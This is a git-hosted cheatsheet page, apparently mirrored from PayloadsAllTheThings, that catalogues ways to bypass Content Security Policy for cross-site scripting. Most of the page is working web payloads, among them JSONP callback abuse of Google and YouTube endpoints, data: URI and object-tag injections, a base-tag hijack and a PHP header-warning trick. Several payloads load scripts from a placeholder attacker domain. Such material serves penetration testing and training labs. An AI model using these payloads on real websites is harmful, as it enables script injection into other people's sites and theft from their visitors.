daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

4-csp-bypass.md (7386B)


      1 ---
      2 title: "CSP Bypass"
      3 topic: "XSS Injection"
      4 topicSlug: "xss-injection"
      5 sourcePath: "XSS Injection/4 - CSP Bypass.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/XSS%20Injection/4%20-%20CSP%20Bypass.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # CSP Bypass
     12 
     13 > A Content Security Policy (CSP) is a security feature that helps prevent cross-site scripting (XSS), data injection attacks, and other code-injection vulnerabilities in web applications. It works by specifying which sources of content (like scripts, styles, images, etc.) are allowed to load and execute on a webpage.
     14 
     15 ## Summary
     16 
     17 - [Tools](#tools)
     18 - [Bypass CSP using JSONP](#bypass-csp-using-jsonp)
     19 - [Bypass CSP default-src](#bypass-csp-default-src)
     20 - [Bypass CSP inline eval](#bypass-csp-inline-eval)
     21 - [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
     22 - [Bypass CSP script-src self](#bypass-csp-script-src-self)
     23 - [Bypass CSP script-src data](#bypass-csp-script-src-data)
     24 - [Bypass CSP nonce](#bypass-csp-nonce)
     25 - [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php)
     26 - [Labs](#labs)
     27 - [References](#references)
     28 
     29 ## Tools
     30 
     31 - [gmsgadget.com](https://gmsgadget.com/) - GMSGadget (Give Me a Script Gadget) is a collection of JavaScript gadgets that can be used to bypass XSS mitigations such as Content Security Policy (CSP) and HTML sanitizers like DOMPurify.
     32 - [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) - CSP Evaluator allows developers and security experts to check if a Content Security Policy (CSP) serves as a strong mitigation against cross-site scripting attacks.
     33 
     34 ## Bypass CSP using JSONP
     35 
     36 **Requirements**:
     37 
     38 - CSP: `script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';`
     39 
     40 **Payload**:
     41 
     42 Use a callback function from a whitelisted source listed in the CSP.
     43 
     44 - Google Search: `//google.com/complete/search?client=chrome&jsonp=alert(1);`
     45 - Google Account: `https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)`
     46 - Google Translate: `https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();`
     47 - Youtube: `https://www.youtube.com/oembed?callback=alert;`
     48 - [Intruders/jsonp_endpoint.txt](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/Intruders/jsonp_endpoint.txt)
     49 - [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
     50 
     51 ```js
     52 <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
     53 ```
     54 
     55 ## Bypass CSP default-src
     56 
     57 **Requirements**:
     58 
     59 - CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`,
     60 
     61 **Payload**:
     62 
     63 `http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//[ATTACKER.DOMAIN.TLD]/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
     64 
     65 ```js
     66 script=document.createElement('script');
     67 script.src='//[ATTACKER.DOMAIN.TLD]/csp.js';
     68 window.frames[0].document.head.appendChild(script);
     69 ```
     70 
     71 Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
     72 
     73 ## Bypass CSP inline eval
     74 
     75 **Requirements**:
     76 
     77 - CSP `inline` or `eval`
     78 
     79 **Payload**:
     80 
     81 ```js
     82 d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[ATTACKER.DOMAIN.TLD]";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
     83 ```
     84 
     85 Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
     86 
     87 ## Bypass CSP script-src self
     88 
     89 **Requirements**:
     90 
     91 - CSP like `script-src self`
     92 
     93 **Payload**:
     94 
     95 ```js
     96 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
     97 ```
     98 
     99 Source: [@akita_zen](https://twitter.com/akita_zen)
    100 
    101 ## Bypass CSP script-src data
    102 
    103 **Requirements**:
    104 
    105 - CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
    106 
    107 **Payload**:
    108 
    109 ```javascript
    110 <script src="data:,alert(1)">/</script>
    111 ```
    112 
    113 Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
    114 
    115 ## Bypass CSP unsafe-inline
    116 
    117 **Requirements**:
    118 
    119 - CSP: `script-src https://google.com 'unsafe-inline';`
    120 
    121 **Payload**:
    122 
    123 ```javascript
    124 "/><script>alert(1);</script>
    125 ```
    126 
    127 ## Bypass CSP nonce
    128 
    129 **Requirements**:
    130 
    131 - CSP like `script-src 'nonce-RANDOM_NONCE'`
    132 - Imported JS file with a relative link: `<script src='/PATH.js'></script>`
    133 
    134 **Payload**:
    135 
    136 - Inject a base tag.
    137 
    138   ```html
    139   <base href=http://[ATTACKER.DOMAIN.TLD]>
    140   ```
    141 
    142 - Host your custom js file at the same path that one of the website's script.
    143 
    144   ```ps1
    145   http://[ATTACKER.DOMAIN.TLD]/PATH.js
    146   ```
    147 
    148 ## Bypass CSP header sent by PHP
    149 
    150 **Requirements**:
    151 
    152 - CSP sent by PHP `header()` function
    153 
    154 **Payload**:
    155 
    156 In default `php:apache` image configuration, PHP cannot modify headers when the response's data has already been written. This event occurs when a warning is raised by PHP engine.
    157 
    158 Here are several ways to generate a warning:
    159 
    160 - 1000 $_GET parameters
    161 - 1000 $_POST parameters
    162 - 20 $_FILES
    163 
    164 If the **Warning** are configured to be displayed you should get these:
    165 
    166 - **Warning**: `PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0`
    167 - **Warning**: `Cannot modify header information - headers already sent in /var/www/html/index.php on line 2`
    168 
    169 ```ps1
    170 GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a
    171 ```
    172 
    173 Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
    174 
    175 ## Labs
    176 
    177 - [Root Me - CSP Bypass - Inline Code](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Inline-code)
    178 - [Root Me - CSP Bypass - Nonce](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce)
    179 - [Root Me - CSP Bypass - Nonce 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce-2)
    180 - [Root Me - CSP Bypass - Dangling Markup](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup)
    181 - [Root Me - CSP Bypass - Dangling Markup 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup-2)
    182 - [Root Me - CSP Bypass - JSONP](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-JSONP)
    183 
    184 ## References
    185 
    186 - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://web.archive.org/web/20170330144550/https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)
    187 - [D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - June 27, 2017](http://web.archive.org/web/20170627043828/https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf)
    188 - [How to use Google’s CSP Evaluator to bypass CSP - Thomas Orlita - September 9, 2018](https://web.archive.org/web/20260220005424/https://websecblog.com/vulns/google-csp-evaluator/)
    189 - [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - April 6, 2020](https://web.archive.org/web/20260226005506/https://www.buaq.net/go-25883.html)